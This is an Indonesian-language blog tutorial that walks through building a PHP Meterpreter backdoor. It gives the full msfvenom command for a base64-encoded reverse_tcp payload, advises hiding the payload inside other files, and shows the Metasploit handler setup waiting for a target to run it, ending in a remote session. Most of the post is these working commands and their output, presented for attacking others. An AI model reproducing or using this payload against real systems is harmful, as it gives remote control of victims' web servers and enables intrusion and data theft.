Open top menu
Tuesday, September 29, 2015

Oke kali ini saya akan share cara mendapatkan meterpreter session pada metasploit menggunakan backdoor PHP. Yang akan saya terangan hanya pokok pokok nya saja. Jadi bagi yang belum paham samasekali bisa baca di " Hack Windows 7 with S.E.T + Metasploit on BackBox Linux ".

Oke, kali ini kita akn buat backdoor nya.

root@backbox:/home/jackwilder# msfvenom -p php/meterpreter/reverse_tcp LHOST=[ip kita] LPORT=666 -e php/base64 --platform php > payload.php





Oke saya jelaskan keterangannya :


-e : encode menggunakan php base64.


--platform : platform yang akan digunakan.





Nanti output nya adalah file bernama payload.php .


File tadi masih bentuk mentah tanpa awalan <?php .


Kalian bisa menyisipkan payload tadi di file lain.


Lalu buka metasploit.






root@backbox:/home/jackwilder# msfconsole




msf > use exploit/multi/handler


msf exploit(handler) > set payload php/meterpreter/reverse_tcp


payload => php/meterpreter/reverse_tcp


msf exploit(handler) > set LHOST 127.0.0.1


LHOST => 127.0.0.1


msf exploit(handler) > set LPORT 666


LPORT => 666


msf exploit(handler) > exploit





[*] Started reverse handler on 127.0.0.1:666 


[*] Starting the payload handler...






Tunggu sampai target mengeksekusi payloads.




Welcome meterpreter session.





bagi yang kurang jelas bisa lihat video nya disini :

Hack Kali Linux OS with PHP Payloads BackBox Linux



Sekian tutor kali ini semoga bermanfaat,
Tagged
Different Themes
Written by Kcnewbie

Ikatlah ilmu dengan menuliskanya.

0 comments

Subscribe to: Post Comments (Atom)